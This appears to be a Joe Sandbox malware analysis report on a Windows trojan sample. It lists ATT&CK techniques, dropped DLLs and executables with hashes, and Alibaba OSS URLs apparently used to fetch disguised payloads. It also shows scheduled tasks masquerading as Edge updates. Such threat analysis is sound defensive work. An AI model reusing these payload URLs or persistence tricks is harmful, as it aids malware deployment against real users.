Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		4_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1387457-38765948.15.exe	8%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\4fkch1\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\G1f92m\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\4fkch1\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\G1f92m\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\4fkch1\4fkch1.exe	0%	ReversingLabs
C:\Program Files (x86)\G1f92m\12xy9.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\cajXRH.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://yandex.com0	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1002	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifl	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifQ	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifD	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQ	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/p	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifQ	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifdns.aliyuncs.com.gds.alibabadns.comLMEM	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif.	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifp	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQL	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif4	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif(	0%	Avira URL Cloud	safe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/.gif	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	high
sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com	47.101.26.25	true	false	unknown
cavuax.net	unknown	unknown	false	unknown
jcoiw1.oss-cn-shanghai.aliyuncs.com	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQ	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifl	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifD	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1002	1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/p	1387457-38765948.15.exe, 00000000.00000003.2173562010.000000000050B000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yandex.com0	1387457-38765948.15.exe	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifQ	1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/	1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifdns.aliyuncs.com.gds.alibabadns.comLMEM	1387457-38765948.15.exe, 00000000.00000003.2173635647.0000000000490000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifQ	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rarC:	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif.	1387457-38765948.15.exe, 00000000.00000003.2173635647.0000000000490000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifp	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifL	1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://%s/ip.txt	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQL	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif(	1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/.gif	1387457-38765948.15.exe, 00000000.00000003.2173562010.000000000050B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif4	1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
47.101.26.25	sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.210.64.208	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589380
Start date and time:	2025-01-12 04:09:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1387457-38765948.15.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@66/29@15/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:11:23	Task Scheduler	Run new task: uxc7T path: C:\Users\user\Documents\cajXRH.exe
03:12:13	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 BvVNZ path: C:\Program Files (x86)\G1f92m\12xy9.exe
03:12:13	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 tC595 path: C:\Program Files (x86)\4fkch1\4fkch1.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.9	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.9
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	http://www.k03g.xyz/	Get hash	malicious	Unknown	Browse	47.254.186.224
	https://telegramerong.cc/app/	Get hash	malicious	Telegram Phisher	Browse	47.251.98.254
	http://telegramerong.cc/app	Get hash	malicious	Telegram Phisher	Browse	47.251.98.254
	https://telegld.vip/app	Get hash	malicious	Telegram Phisher	Browse	47.88.77.187
	https://kelegran.cc/apps.html	Get hash	malicious	Telegram Phisher	Browse	47.88.77.187
	https://teleguii.cc/app	Get hash	malicious	Telegram Phisher	Browse	47.88.77.187
	https://ketegro.cc/apps.html	Get hash	malicious	Telegram Phisher	Browse	198.11.177.38
	res.x86.elf	Get hash	malicious	Unknown	Browse	8.213.37.156
	6.elf	Get hash	malicious	Unknown	Browse	8.209.129.217
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	8.218.14.120
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	80P.exe	Get hash	malicious	I2PRAT	Browse	120.26.116.232
	5.elf	Get hash	malicious	Unknown	Browse	123.56.46.120
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.103
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2976587-987347589.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	5.elf	Get hash	malicious	Unknown	Browse	139.240.73.120
	4.elf	Get hash	malicious	Unknown	Browse	42.120.233.253
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	80P.exe	Get hash	malicious	I2PRAT	Browse	120.26.116.232
	5.elf	Get hash	malicious	Unknown	Browse	123.56.46.120
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.103
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2976587-987347589.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	5.elf	Get hash	malicious	Unknown	Browse	139.240.73.120
	4.elf	Get hash	malicious	Unknown	Browse	42.120.233.253
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	8.136.96.106

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	build.exe	Get hash	malicious	Vidar	Browse	47.101.26.25 118.178.60.9
	zmpZMfK1b4.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	47.101.26.25 118.178.60.9
	ix8kxoBHDb.exe	Get hash	malicious	Remcos, GuLoader	Browse	47.101.26.25 118.178.60.9
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	47.101.26.25 118.178.60.9
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	47.101.26.25 118.178.60.9
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	47.101.26.25 118.178.60.9
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	47.101.26.25 118.178.60.9
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	47.101.26.25 118.178.60.9
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	47.101.26.25 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\4fkch1\4fkch1.exe	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\4fkch1\4fkch1.exe

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2976587-987347589.07.exe, Detection: malicious, Browse Filename: 2976587-987347589.08.exe, Detection: malicious, Browse Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\4fkch1\log.src

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955225445323
Encrypted:	true
SSDEEP:	98304:AOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:3o6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	21DF2B8179DD6ABF09FDAAE977771843
SHA1:	C6A52AFC1877637E92317B9E92AC76F69272C3A5
SHA-256:	2AC3B5D7BE3E466A1BE0273EF0382DD02F50C9EE9034257F78B722261DC67C74
SHA-512:	584F067B2820ABE39D3506D9F5BAC671D26CA9F76902C437C00E5A8BCE4742AC06B45F220DFDBE70AB08008CA083F81278739C385B754539680F8F841B0FA60F
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\4fkch1\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517169273874
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/S:9S4+O6P5OeMRrjRy7aPZbm3k8V/S
MD5:	C03BF9EF1358B5447D71D018FB713F03
SHA1:	9FB44BF550B9F38D0E182611C9CC02015507AB82
SHA-256:	CEA5777238DF3E4A96661B0207799A5D44EEFD0AC4684209624A33D8F2C67903
